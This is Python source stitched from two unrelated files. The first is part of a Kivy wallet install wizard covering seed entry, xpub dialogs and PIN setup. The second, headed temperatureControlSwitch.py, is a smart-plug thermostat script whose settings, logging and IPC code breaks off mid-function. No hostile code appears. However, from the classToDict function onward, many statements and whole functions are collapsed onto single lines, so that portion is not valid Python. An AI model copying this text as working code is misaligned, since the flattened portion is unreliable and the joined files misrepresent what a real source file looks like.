    def get_suggestions(self, prefix):
        # Yield every known word starting with the typed prefix.
        for w in self.words:
            if w.startswith(prefix):
                yield w

    def on_text(self, dt):
        # Re-validate the seed and rebuild suggestions / key enablement.
        self.ids.next.disabled = not bool(self._test(self.get_text()))
        text = self.ids.text_input_seed.text
        if not text:
            last_word = ''
        elif text[-1] == ' ':
            last_word = ''
        else:
            last_word = text.split(' ')[-1]
        enable_space = False
        self.ids.suggestions.clear_widgets()
        suggestions = [x for x in self.get_suggestions(last_word)]
        if last_word in suggestions:
            # Current word is complete: offer it and allow a space.
            b = WordButton(text=last_word)
            self.ids.suggestions.add_widget(b)
            enable_space = True
        for w in suggestions:
            if w != last_word and len(suggestions) < 10:
                b = WordButton(text=w)
                self.ids.suggestions.add_widget(b)
        # Enable only letters that can extend the current word.
        i = len(last_word)
        p = set()
        for x in suggestions:
            if len(x)>i:
                p.add(x[i])
        for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
            for c in line.children:
                if isinstance(c, Button):
                    if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
                        c.disabled = (c.text.lower() not in p) and bool(last_word)
                    elif c.text == ' ':
                        c.disabled = not enable_space

    def on_word(self, w):
        # A suggestion button was pressed: replace the partial word with it.
        text = self.get_text()
        words = text.split(' ')
        words[-1] = w
        text = ' '.join(words)
        self.ids.text_input_seed.text = text + ' '
        self.ids.suggestions.clear_widgets()

    def get_text(self):
        # Normalized seed text: single spaces, no leading/trailing whitespace.
        ti = self.ids.text_input_seed
        return ' '.join(ti.text.strip().split())

    def update_text(self, c):
        # Virtual-keyboard key handler; '<' is backspace.
        c = c.lower()
        text = self.ids.text_input_seed.text
        if c == '<':
            text = text[:-1]
        else:
            text += c
        self.ids.text_input_seed.text = text

    def on_parent(self, instance, value):
        if value:
            tis = self.ids.text_input_seed
            tis.focus = True
            #tis._keyboard.bind(on_key_down=self.on_key_down)
            self._back = _back = partial(self.ids.back.dispatch, 'on_release')
            app = App.get_running_app()

    def on_key_down(self, keyboard, keycode, key, modifiers):
        # 13 = enter, 271 = numpad enter
        if keycode[0] in (13, 271):
            self.on_enter()
            return True

    def on_enter(self):
        #self._remove_keyboard()
        # press next
        next = self.ids.next
        if not next.disabled:
            next.dispatch('on_release')

    def _remove_keyboard(self):
        tis = self.ids.text_input_seed
        if tis._keyboard:
            tis._keyboard.unbind(on_key_down=self.on_key_down)
            tis.focus = False

    def get_params(self, b):
        return (self.get_text(), False, self.ext)


class ConfirmSeedDialog(RestoreSeedDialog):
    """Re-entry of a just-displayed seed; no seed options offered."""

    def get_params(self, b):
        return (self.get_text(),)

    def options_dialog(self):
        pass


class ShowXpubDialog(WizardDialog):
    """Display the master public key with copy/share/QR actions."""

    def __init__(self, wizard, **kwargs):
        WizardDialog.__init__(self, wizard, **kwargs)
        self.xpub = kwargs['xpub']
        self.ids.next.disabled = False

    def do_copy(self):
        self.app._clipboard.copy(self.xpub)

    def do_share(self):
        self.app.do_share(self.xpub, _("Master Public Key"))

    def do_qr(self):
        from .qr_dialog import QRDialog
        popup = QRDialog(_("Master Public Key"), self.xpub, True)
        popup.open()


class AddXpubDialog(WizardDialog):
    """Collect a cosigner xpub by typing, pasting or scanning a QR code."""

    def __init__(self, wizard, **kwargs):
        WizardDialog.__init__(self, wizard, **kwargs)
        # Validator callable for the entered key material.
        self.is_valid = kwargs['is_valid']
        self.title = kwargs['title']
        self.message = kwargs['message']
        self.allow_multi = kwargs.get('allow_multi', False)

    def check_text(self, dt):
        self.ids.next.disabled = not bool(self.is_valid(self.get_text()))

    def get_text(self):
        ti = self.ids.text_input
        return ti.text.strip()

    def get_params(self, button):
        return (self.get_text(),)

    def scan_xpub(self):
        def on_complete(text):
            if self.allow_multi:
                # Accumulate several keys, one per line.
                self.ids.text_input.text += text + '\n'
            else:
                self.ids.text_input.text = text
        self.app.scan_qr(on_complete)

    def do_paste(self):
        self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()

    def do_clear(self):
        self.ids.text_input.text = ''


class InstallWizard(BaseWizard, Widget):
    '''
    events::
        `on_wizard_complete`
            Fired when the wizard is done creating/ restoring wallet/s.
    '''

    __events__ = ('on_wizard_complete', )

    def on_wizard_complete(self, wallet):
        """overriden by main_window"""
        pass

    def waiting_dialog(self, task, msg, on_finished=None):
        '''Perform a blocking task in the background by running the passed
        method in a thread.
        '''
        def target():
            # run your threaded function
            try:
                task()
            except Exception as err:
                self.show_error(str(err))
            # on completion hide message
            Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
            if on_finished:
                def protected_on_finished():
                    try:
                        on_finished()
                    except Exception as e:
                        self.show_error(str(e))
                Clock.schedule_once(lambda dt: protected_on_finished(), -1)
        app = App.get_running_app()
        app.show_info_bubble(
            text=msg, icon='atlas://electrum_dash/gui/kivy/theming/light/important',
            pos=Window.center, width='200sp', arrow_pos=None, modal=True)
        t = threading.Thread(target = target)
        t.start()

    def terminate(self, **kwargs):
        self.dispatch('on_wizard_complete', self.wallet)

    def choice_dialog(self, **kwargs):
        choices = kwargs['choices']
        if len(choices) > 1:
            WizardChoiceDialog(self, **kwargs).open()
        else:
            # Only one choice: take it without showing a dialog.
            f = kwargs['run_next']
            f(choices[0][0])

    def multisig_dialog(self, **kwargs):
        WizardMultisigDialog(self, **kwargs).open()

    def show_seed_dialog(self, **kwargs):
        ShowSeedDialog(self, **kwargs).open()

    def line_dialog(self, **kwargs):
        LineDialog(self, **kwargs).open()

    def confirm_seed_dialog(self, **kwargs):
        kwargs['title'] = _('Confirm Seed')
        kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
        ConfirmSeedDialog(self, **kwargs).open()

    def restore_seed_dialog(self, **kwargs):
        RestoreSeedDialog(self, **kwargs).open()

    def confirm_dialog(self, **kwargs):
        WizardConfirmDialog(self, **kwargs).open()

    def tos_dialog(self, **kwargs):
        WizardTOSDialog(self, **kwargs).open()

    def email_dialog(self, **kwargs):
        WizardEmailDialog(self, **kwargs).open()

    def otp_dialog(self, **kwargs):
        # A fresh secret means first-time setup; otherwise ask for a known code.
        if kwargs['otp_secret']:
            WizardNewOTPDialog(self, **kwargs).open()
        else:
            WizardKnownOTPDialog(self, **kwargs).open()

    def add_xpub_dialog(self, **kwargs):
        kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
        AddXpubDialog(self, **kwargs).open()

    def add_cosigner_dialog(self, **kwargs):
        kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
        kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
        AddXpubDialog(self, **kwargs).open()

    def show_xpub_dialog(self, **kwargs):
        ShowXpubDialog(self, **kwargs).open()

    def show_message(self, msg):
        self.show_error(msg)

    def show_error(self, msg):
        app = App.get_running_app()
        # Marshal onto the UI thread via the Kivy clock.
        Clock.schedule_once(lambda dt: app.show_error(msg))

    def request_password(self, run_next, force_disable_encrypt_cb=False):
        if force_disable_encrypt_cb:
            # do not request PIN for watching-only wallets
            run_next(None, False)
            return
        def on_success(old_pin, pin):
            assert old_pin is None
            run_next(pin, False)
        def on_failure():
            # Re-run this step until the two PIN entries match.
            self.show_error(_('PIN mismatch'))
            self.run('request_password', run_next)
        popup = PasswordDialog()
        app = App.get_running_app()
        popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
        popup.open()

    def action_dialog(self, action, run_next):
        # Dispatch to a method of self by name.
        f = getattr(self, action)
        f()
# temperatureControlSwitch.py
import os
import time
import math
import sys
import json
import copy
from datetime import datetime
from threading import Thread, Lock

import temperatureSensorLib
import smartPlugLib
import ipc
from getTempChartArray import updateTemperatureLogFile

################################################################################
# Setting Specified Via The .json File
################################################################################
class tempCtrlSwitchSettings(object):
    """Container for all thermostat settings loaded from the .json file.

    Every attribute starts as None and is filled in by dictToClass(); two
    instances compare equal when every setting matches.
    """
    def __init__(self):
        self.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE = None  # in seconds
        self.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE = None  # in seconds
        self.TIME_BETWEEN_TEMPERATURE_CHECK = None  # in seconds
        self.SWITCH_TEMPERATURE = None  # in degrees Fahrenheit
        self.SWITCH_COMFORT_RANGE = None  # in degrees Fahrenheit
        self.SWITCH_HEAT_COOL = None  # -1 = Cool, 0 = Off, 1 = Heat
        self.SMART_PLUG_IP_ADDR = None
        self.TIME_OF_DAY_TO_START = None
        self.TIME_OF_DAY_TO_STOP = None
        self.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = False  # False for off, True for on, None for no change
        # Derived: averaging window, computed from TIME_BETWEEN_TEMPERATURE_CHECK.
        self.TEMPERATURE_AVERAGE_TIME_AMOUNT = None
        self.INVALID_TEMPERATURE_LOW = None  # in degrees Fahrenheit
        self.INVALID_TEMPERATURE_HIGH = None  # in degrees Fahrenheit
        self.DEVICE_NAME = None
        self.DEVICE_COLOR = None

    def __eq__(self, obj):
        # Attribute-by-attribute comparison of every configured setting.
        return isinstance(obj, tempCtrlSwitchSettings) and \
            obj.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE == self.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE and \
            obj.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE == self.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE and \
            obj.TIME_BETWEEN_TEMPERATURE_CHECK == self.TIME_BETWEEN_TEMPERATURE_CHECK and \
            obj.SWITCH_TEMPERATURE == self.SWITCH_TEMPERATURE and \
            obj.SWITCH_COMFORT_RANGE == self.SWITCH_COMFORT_RANGE and \
            obj.SWITCH_HEAT_COOL == self.SWITCH_HEAT_COOL and \
            obj.SMART_PLUG_IP_ADDR == self.SMART_PLUG_IP_ADDR and \
            obj.TIME_OF_DAY_TO_START == self.TIME_OF_DAY_TO_START and \
            obj.TIME_OF_DAY_TO_STOP == self.TIME_OF_DAY_TO_STOP and \
            obj.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP == self.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP and \
            obj.TEMPERATURE_AVERAGE_TIME_AMOUNT == self.TEMPERATURE_AVERAGE_TIME_AMOUNT and \
            obj.INVALID_TEMPERATURE_LOW == self.INVALID_TEMPERATURE_LOW and \
            obj.INVALID_TEMPERATURE_HIGH == self.INVALID_TEMPERATURE_HIGH and \
            obj.DEVICE_NAME == self.DEVICE_NAME and \
            obj.DEVICE_COLOR == self.DEVICE_COLOR

    def __ne__(self, obj):
        # NOTE(review): __eq__ above never returns NotImplemented, so the
        # guard below is defensive only.
        result = self.__eq__(obj)
        if result is NotImplemented:
            return result
        return not result

# Live settings shared between the IPC thread and the main loop; guard
# access with settingsMutex.
currentTempCtrlSettings = tempCtrlSwitchSettings()
currentTempCtrlDict = dict()
settingsMutex = Lock()

################################################################################
# Constant Variables
################################################################################
THIS_SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
THIS_SCRIPT_FILENAME_NO_EXT = os.path.splitext(os.path.realpath(__file__))[0]
JSON_PATH = THIS_SCRIPT_FILENAME_NO_EXT + '.json'
IPC_SOCKET_PATH = os.path.join(THIS_SCRIPT_DIR, 'ipcSocket')
WEB_LOG_PATH = os.path.join(THIS_SCRIPT_DIR, 'web', 'tempCtrlSwitch.log')

################################################################################
# Global Variables
################################################################################
WAY_IN_THE_PAST = -1000000
lastSuccessfulSwitchChangeTime = WAY_IN_THE_PAST  # Initialize to a time way in the past to ensure
lastFailedSwitchChangeTime = WAY_IN_THE_PAST      # the switch can be set right away at boot time.
nextTemperatureCheckTime = 0
checkForSwitchChangeDuringNonSwitchTime = True
newParametersForMainLoop = True
temperatureStoreValuesForAverage = []
lastTemperatureValue = None
lastTemperatureAverage = None
lastTemperatureLogTime = 0
currentSwitchState = None  # False for off, True for on, None unknown

# Log-file rotation parameters.
logNewLine = '\n'
logMaxLogLines_short = 5000
logLineToLeaveAfterTrim_short = 3000
logMaxLogLines_long = 50000
logLineToLeaveAfterTrim_long = 30000

################################################################################
# Enumerated Values
################################################################################
SWITCH_STATE_OFF = "Off"
SWITCH_STATE_ON = "On"
SWITCH_STATE_NO_CHANGE = "No Change"

CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED = "Success - No Change Needed"
CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED = "Success - Switch State Changed"
CHANGE_SWITCH_RESULT_FAILED = "Failed"

################################################################################
# Generic Helper Functions
################################################################################
def readWholeFile(path):
    """Return the entire contents of the file at path, or "" on any failure."""
    retVal = ""
    try:
        # 'with' guarantees the handle is closed even if read() fails.
        with open(path, 'r') as fileId:
            retVal = fileId.read()
    except Exception:
        # Best effort by design: a missing/unreadable file yields "".
        pass
    return retVal

def writeWholeFile(path, fileText):
    """Overwrite the file at path with fileText; failures are ignored."""
    try:
        with open(path, 'w') as fileId:
            fileId.write(fileText)
    except Exception:
        pass

def appendFile(path, fileText):
    """Append fileText to the file at path; failures are ignored."""
    try:
        with open(path, 'a') as fileId:
            fileId.write(fileText)
    except Exception:
        pass

def limitLogSize(logFilePath, trimFromTop, logMaxLogLines, logLineToLeaveAfterTrim):
    """Trim the log file down to logLineToLeaveAfterTrim lines once it
    exceeds logMaxLogLines. trimFromTop selects which end is discarded."""
    logFile = readWholeFile(logFilePath)
    lineCount = logFile.count(logNewLine)
    if lineCount > logMaxLogLines:
        if trimFromTop:
            logFile = logNewLine.join(logFile.split(logNewLine)[-logLineToLeaveAfterTrim:])
        else:
            logFile = logNewLine.join(logFile.split(logNewLine)[:logLineToLeaveAfterTrim])
        writeWholeFile(logFilePath, logFile)

def logMsg(printMsg, unimportantMsg = False):
    """Log printMsg to stdout, to the long on-disk log and (unless
    unimportantMsg) to the newest-first web log."""
    shortTimeFormat = "%H:%M %m/%d"  # 24 hour value
    #shortTimeFormat = "%I:%M%p %m/%d" # 12 hour value with AM/PM
    shortTimeStr = "{}".format(time.strftime(shortTimeFormat))
    longTimeStr = str(datetime.now())

    # Long log: oldest first, trimmed from the top.
    logLine = '[' + longTimeStr + "] " + printMsg
    print(logLine)
    logPath = os.path.splitext(os.path.realpath(__file__))[0] + '.log'
    appendFile(logPath, logLine + logNewLine)
    limitLogSize(logPath, True, logMaxLogLines_long, logLineToLeaveAfterTrim_long)

    try:
        if not unimportantMsg:
            # Web log: newest first, prefixed with the current temperature.
            temperatureStr = str(lastTemperatureValue)
            if lastTemperatureValue is not None:
                temperatureStr = "{:.1f}".format(lastTemperatureValue)
            webLine = temperatureStr + " " + shortTimeStr + "-" + printMsg
            writeWholeFile(WEB_LOG_PATH, webLine + logNewLine + readWholeFile(WEB_LOG_PATH))
            limitLogSize(WEB_LOG_PATH, False, logMaxLogLines_short, logLineToLeaveAfterTrim_short)
    except Exception:
        # Was a Python-2-only print statement; now valid on 2 and 3.
        print("Failed to log to web. - " + WEB_LOG_PATH)

def getCurrentTime():
    """Return the system uptime in seconds (monotonic-ish), or None on failure."""
    uptime_seconds = None
    try:
        with open('/proc/uptime', 'r') as f:
            uptime_seconds = float(f.readline().split()[0])
    except Exception:
        logMsg("Failed to get current time")
    return uptime_seconds

################################################################################
# JSON Functions
################################################################################
def strToTimeInt(inStr):
    """Parse a time-of-day string ("7:30pm", "1930", "7") into an int of the
    form hour*100 + minute (24-hour). Raises ValueError on bad input."""
    try:
        iniTimeStr = inStr.lower()
        hour = 0
        minute = 0
        isPm = None

        # Determine AM / PM
        if iniTimeStr[-2:] == "pm":
            isPm = True
        elif iniTimeStr[-2:] == "am":
            isPm = False
        if isPm is not None:
            iniTimeStr = iniTimeStr[:-2]

        if ':' in iniTimeStr:
            hour = int(iniTimeStr.split(':')[0])
            minute = int(iniTimeStr.split(':')[1])
        else:
            totalTime = int(iniTimeStr)
            if totalTime >= 100:
                # Floor division keeps this an int under Python 3 as well.
                hour = totalTime // 100
                minute = totalTime % 100
            elif totalTime < 24:
                hour = totalTime
                minute = 0
            else:
                # this one seem unlikely to get to
                hour = 0
                minute = totalTime

        # A 24-hour style hour >= 12 is inherently PM.
        if hour >= 12 and isPm is None:
            isPm = True
        if hour >= 12:
            hour -= 12
        if isPm:
            hour += 12
        return hour*100 + minute
    except Exception:
        raise ValueError('Invalid Time Read.')

def timeIntToStr(timeInt, useAmPm = False):
    """Format an hour*100+minute int as "HH:MM" (default) or "hh:mm AM/PM"."""
    if useAmPm:
        # 12 Hour with AM / PM
        amPmStr = " AM"
        hour = int(timeInt // 100)
        minute = int(timeInt % 100)
        if hour >= 12:
            amPmStr = " PM"
        if hour >= 13:
            hour -= 12
        elif hour == 0:
            hour = 12
    else:
        # 24 hour that the web server wants.
        amPmStr = ""
        hour = int(timeInt // 100)
        minute = int(timeInt % 100)
    return "{:02d}:{:02d}".format(hour, minute) + amPmStr

def tryDictSettingToType(convertFunc, settingsDict, dictStr, origVal):
    """Fetch settingsDict[dictStr] and convert it with convertFunc.

    Returns [entryExists, conversionSucceeded, value]; value falls back to
    origVal when the key is missing or conversion fails."""
    dictEntryExists = False
    convertFuncSuccess = False
    retVal = origVal
    try:
        dictVal = settingsDict[dictStr]
        dictEntryExists = True
    except Exception:
        pass
    if dictEntryExists:
        try:
            retVal = convertFunc(dictVal)
            convertFuncSuccess = True
        except Exception:
            pass
    return [dictEntryExists, convertFuncSuccess, retVal]

def getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted):
    """Fold one field's (exists, converted) result into the three running
    validity flags: all fields valid / all present fields valid / any valid."""
    return [allValid and exists and converted,
            allAvailValid and (converted or not exists),
            anyValid or converted]

# (converter, json key, attribute name) for every plain settings field.
# SwitchStateAfterTimeOfDayStop is handled separately in dictToClass().
_SETTINGS_FIELDS = [
    (float,        'MinTimeBetweenChangingSwitchState', 'MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE'),
    (float,        'MinTimeBetweenRetryingSwitchChange', 'MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE'),
    (float,        'TimeBetweenTempCheck',              'TIME_BETWEEN_TEMPERATURE_CHECK'),
    (float,        'SwitchTemperature',                 'SWITCH_TEMPERATURE'),
    (float,        'SwitchComfortRange',                'SWITCH_COMFORT_RANGE'),
    (float,        'SwitchHeatCool',                    'SWITCH_HEAT_COOL'),
    (str,          'SmartPlugIpAddr',                   'SMART_PLUG_IP_ADDR'),
    (strToTimeInt, 'TimeOfDayToStart',                  'TIME_OF_DAY_TO_START'),
    (strToTimeInt, 'TimeOfDayToStop',                   'TIME_OF_DAY_TO_STOP'),
    (float,        'InvalidTempLow',                    'INVALID_TEMPERATURE_LOW'),
    (float,        'InvalidTempHigh',                   'INVALID_TEMPERATURE_HIGH'),
    (str,          'DeviceName',                        'DEVICE_NAME'),
    (str,          'DeviceColor',                       'DEVICE_COLOR'),
]

def dictToClass(settingsDict, settingsClass):
    """Copy settings from a parsed-JSON dict into settingsClass.

    Each field keeps its previous value when missing or unconvertible.
    Returns [allValid, allAvailValid, anyValid] as produced by
    getValidDictToClass over every field."""
    allValid = True
    allAvailValid = True
    anyValid = False

    # Table-driven replacement for 13 copy-pasted stanzas; order is
    # irrelevant because the fields are independent.
    for convertFunc, dictKey, attrName in _SETTINGS_FIELDS:
        [exists, converted, val] = tryDictSettingToType(
            convertFunc, settingsDict, dictKey, getattr(settingsClass, attrName))
        setattr(settingsClass, attrName, val)
        [allValid, allAvailValid, anyValid] = getValidDictToClass(
            allValid, allAvailValid, anyValid, exists, converted)

    # Do SwitchStateAfterTimeOfDayStop last so we can do a little extra conversion.
    [exists, converted, val] = tryDictSettingToType(
        str, settingsDict, 'SwitchStateAfterTimeOfDayStop',
        settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP)
    [allValid, allAvailValid, anyValid] = getValidDictToClass(
        allValid, allAvailValid, anyValid, exists, converted)
    if converted:
        # Determine what to set the switch to when entering the time of day
        # to stop controlling the switch.
        finalSwitchStateStr = val.lower()
        if finalSwitchStateStr == 'off':
            settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = False
        elif finalSwitchStateStr == 'on':
            settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = True
        else:
            settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = None

    # This should be the last thing (since it is calculated from other ini values).
    if settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK is not None:
        settingsClass.TEMPERATURE_AVERAGE_TIME_AMOUNT = settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK * 5
    else:
        settingsClass.TEMPERATURE_AVERAGE_TIME_AMOUNT = None

    return [allValid, allAvailValid, anyValid]

def floatToIntStr(floatVal):
    """Round floatVal away from zero and return it as a string."""
    if floatVal > 0.0:
        return str(int(floatVal + 0.5))
    elif floatVal < 0.0:
        return str(-int(-floatVal + 0.5))
    else:
        return str(0)

def temperatureToStr(tempVal):
    """Format a temperature: whole numbers without a decimal, else 1 place."""
    if float(int(tempVal)) == float(tempVal):
        return str(int(tempVal))
    else:
        return "{:.1f}".format(tempVal)

def safeConvertToStr(convertFunc, inVal, failRetVal = ""):
    """Apply convertFunc(inVal), returning failRetVal on any exception."""
    retVal = failRetVal
    try:
        retVal = convertFunc(inVal)
    except Exception:
        pass
    return retVal

def switchStateAfterTimeOfDayStop_toStr(SwitchStateAfterTimeOfDayStop_val):
    """Map the tri-state stop behavior (False/True/None) back to its string."""
    if SwitchStateAfterTimeOfDayStop_val == False:
        retVal = 'Off'
    elif SwitchStateAfterTimeOfDayStop_val == True:
        retVal = 'On'
    else:
        retVal = 'No Change'
    return retVal

def heatCool_toStr(heatCool_val):
    """Map -1/0/1 heat-cool mode to 'Cool'/'Off'/'Heat'."""
    if heatCool_val < 0:
        retVal = 'Cool'
    elif heatCool_val > 0:
        retVal = 'Heat'
    else:
        retVal = 'Off'
    return retVal

def classToDict(settingsClass, settingsDict):
    # Inverse of dictToClass: serialize settings back to JSON-ready strings.
    # (Definition continues beyond this chunk; visible portion unchanged.)
    settingsDict['MinTimeBetweenChangingSwitchState'] = safeConvertToStr(floatToIntStr, settingsClass.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE)
    settingsDict['MinTimeBetweenRetryingSwitchChange'] = safeConvertToStr(floatToIntStr, settingsClass.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE)
    settingsDict['TimeBetweenTempCheck'] = safeConvertToStr(floatToIntStr, settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK)
    settingsDict['SwitchTemperature'] = safeConvertToStr(temperatureToStr, settingsClass.SWITCH_TEMPERATURE)
    settingsDict['SwitchComfortRange'] = safeConvertToStr(temperatureToStr, settingsClass.SWITCH_COMFORT_RANGE)
    settingsDict['SwitchHeatCool'] = safeConvertToStr(floatToIntStr, settingsClass.SWITCH_HEAT_COOL)
    settingsDict['SmartPlugIpAddr'] = settingsClass.SMART_PLUG_IP_ADDR
    settingsDict['TimeOfDayToStart'] = safeConvertToStr(timeIntToStr, settingsClass.TIME_OF_DAY_TO_START)
settingsDict['TimeOfDayToStop'] = safeConvertToStr(timeIntToStr, settingsClass.TIME_OF_DAY_TO_STOP) settingsDict['InvalidTempLow'] = safeConvertToStr(temperatureToStr, settingsClass.INVALID_TEMPERATURE_LOW) settingsDict['InvalidTempHigh'] = safeConvertToStr(temperatureToStr, settingsClass.INVALID_TEMPERATURE_HIGH) # Determine what to set the switch to when entering the time of day to stop controlling the switch. settingsDict['SwitchStateAfterTimeOfDayStop'] = switchStateAfterTimeOfDayStop_toStr(settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP) settingsDict['DeviceName'] = settingsClass.DEVICE_NAME settingsDict['DeviceColor'] = settingsClass.DEVICE_COLOR def fixOldJsonVersions(jsonToFix): fixed = False try: onTemp = float(jsonToFix['SwitchOnTemp']) offTemp = float(jsonToFix['SwitchOffTemp']) jsonToFix['SwitchTemperature'] = safeConvertToStr( temperatureToStr, (onTemp+offTemp) / 2.0 ) jsonToFix['SwitchComfortRange'] = safeConvertToStr( temperatureToStr, abs(onTemp-offTemp) ) if onTemp > offTemp: jsonToFix['SwitchHeatCool'] = safeConvertToStr(int, -1) # Cool elif onTemp < offTemp: jsonToFix['SwitchHeatCool'] = safeConvertToStr(int, 1) # Heat else: jsonToFix['SwitchHeatCool'] = safeConvertToStr(int, 0) # Off del jsonToFix['SwitchOnTemp'] del jsonToFix['SwitchOffTemp'] fixed = True except: pass return jsonToFix def loadSettingsFromJson(): global currentTempCtrlSettings global currentTempCtrlDict success = True try: jsonFromFileSystem = json.loads(readWholeFile(JSON_PATH)) # Fix if needed (i.e. 
check if importing on older version of the .json file) if fixOldJsonVersions(jsonFromFileSystem): writeWholeFile(JSON_PATH, json.dumps(jsonFromFileSystem, indent=3)) # Store off the new version # Copy to the Global Variable currentTempCtrlDict = jsonFromFileSystem success = dictToClass(currentTempCtrlDict, currentTempCtrlSettings)[0] # [0] is allValid except: success = False return success def printTempCtrlSettings(tempCtrlSettings): try: degreeSign= u'\N{DEGREE SIGN}' timeUnit = " sec" tempUnit = " " + '' + "F" # Print in opposite order to make it appear in the correct order in the short log (i.e. last print at top) logMsg("Temp Avg Time = " + str(tempCtrlSettings.TEMPERATURE_AVERAGE_TIME_AMOUNT) + timeUnit) logMsg("Switch State After = " + switchStateAfterTimeOfDayStop_toStr(tempCtrlSettings.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP)) logMsg("Invalid Temp High = " + str(tempCtrlSettings.INVALID_TEMPERATURE_HIGH) + tempUnit) logMsg("Invalid Tem Low = " + str(tempCtrlSettings.INVALID_TEMPERATURE_LOW)+ tempUnit) logMsg("Temp Check Time = " + str(tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK) + timeUnit) logMsg("Min Switch Retry Time = " + str(tempCtrlSettings.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE) + timeUnit) logMsg("Min Switch Toggle Time = " + str(tempCtrlSettings.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE) + timeUnit) logMsg("Smart Plug Ip Addr = " + str(tempCtrlSettings.SMART_PLUG_IP_ADDR)) logMsg("Heat/Cool/Off = " + heatCool_toStr(tempCtrlSettings.SWITCH_HEAT_COOL)) logMsg("Comfort Range = " + str(tempCtrlSettings.SWITCH_COMFORT_RANGE) + tempUnit) logMsg("Temperature = " + str(tempCtrlSettings.SWITCH_TEMPERATURE) + tempUnit) logMsg("Stop Time = " + timeIntToStr(tempCtrlSettings.TIME_OF_DAY_TO_STOP, True)) logMsg("Start Time = " + timeIntToStr(tempCtrlSettings.TIME_OF_DAY_TO_START, True)) logMsg("Device Color = " + str(tempCtrlSettings.DEVICE_COLOR)) logMsg("Device Name = " + str(tempCtrlSettings.DEVICE_NAME)) except: pass 
################################################################################
# IPC Server For New Json Settings
################################################################################


class Event(ipc.Message):
    """IPC message carrying an event type plus arbitrary properties."""
    def __init__(self, event_type, **properties):
        self.type = event_type
        self.properties = properties

    def _get_args(self):
        # (args, kwargs) used by the ipc layer to reconstruct the message.
        return [self.type], self.properties


class Response(ipc.Message):
    """IPC reply message carrying a single text payload."""
    def __init__(self, text):
        self.text = text

    def _get_args(self):
        return [self.text], {}


def updateSettingsFromDict(newSettingsDict):
    """Apply a settings dict received over IPC.

    On a real change: updates the globals, persists the file and wakes the
    main loop. Best-effort; never raises. Caller must hold settingsMutex.
    """
    global currentTempCtrlDict
    global currentTempCtrlSettings
    global checkForSwitchChangeDuringNonSwitchTime
    global newParametersForMainLoop
    try:
        # Work on a copy: dictToClass only overwrites the settings that are
        # valid in the incoming dict.
        newTempCtrlSettings = copy.copy(currentTempCtrlSettings)
        # [2] is the anyValid flag: at least one supplied setting was valid
        # (i.e. newTempCtrlSettings was updated).
        success = dictToClass(newSettingsDict, newTempCtrlSettings)[2]
        if success and currentTempCtrlSettings != newTempCtrlSettings:
            currentTempCtrlSettings = newTempCtrlSettings
            classToDict(newTempCtrlSettings, currentTempCtrlDict)
            checkForSwitchChangeDuringNonSwitchTime = True
            newParametersForMainLoop = True
            logMsg("### Received New Settings")  # typo fixed: was "Recieved"
            printTempCtrlSettings(currentTempCtrlSettings)
            writeWholeFile(JSON_PATH, json.dumps(currentTempCtrlDict, indent=3))
        elif success:
            logMsg("##### Received Same Settings")
        else:  # was a redundant `elif not success:`
            logMsg("##### Received Invalid Settings")
    except Exception:
        pass


def getStatus():
    """Return a dict with the current average temperature and switch state as strings."""
    global lastTemperatureAverage
    global currentSwitchState
    status = dict()
    # currentSwitchState is True/False/None; None means unknown.
    switchStateString = "Unknown"
    if currentSwitchState == True:
        switchStateString = "On"
    elif currentSwitchState == False:
        switchStateString = "Off"
    try:
        status['Temp'] = "{:.1f}".format(lastTemperatureAverage)
    except Exception:
        status['Temp'] = ""  # no average available yet
    status['SwitchState'] = switchStateString
    return status


def getIpcResonseJsonStr():
    """Build the JSON reply for IPC clients: current status plus current settings.

    NOTE(review): keeps the original "Resonse" spelling — it is this
    function's public name.
    """
    global currentTempCtrlSettings
    global currentTempCtrlDict
    statusDict = getStatus()
    settingsDict = dict()
    try:
        classToDict(currentTempCtrlSettings, settingsDict)
    except Exception:
        settingsDict = currentTempCtrlDict  # fall back to the raw loaded dict
    retVal = ""
    try:
        combinedDict = dict()
        combinedDict['status'] = statusDict
        combinedDict['settings'] = settingsDict
        retVal = json.dumps(combinedDict)
    except Exception:
        logMsg("##### Something very bad happened: getIpcResonseJsonStr")
    return retVal


def ipcMessageCallback(objects):
    """ipc.Server callback: apply any settings in the message, reply with current state."""
    global currentTempCtrlSettings
    global settingsMutex
    settingsMutex.acquire()  # Lock Mutex
    try:
        # Try to parse the input message as a json.
        useNewSettings = True
        try:
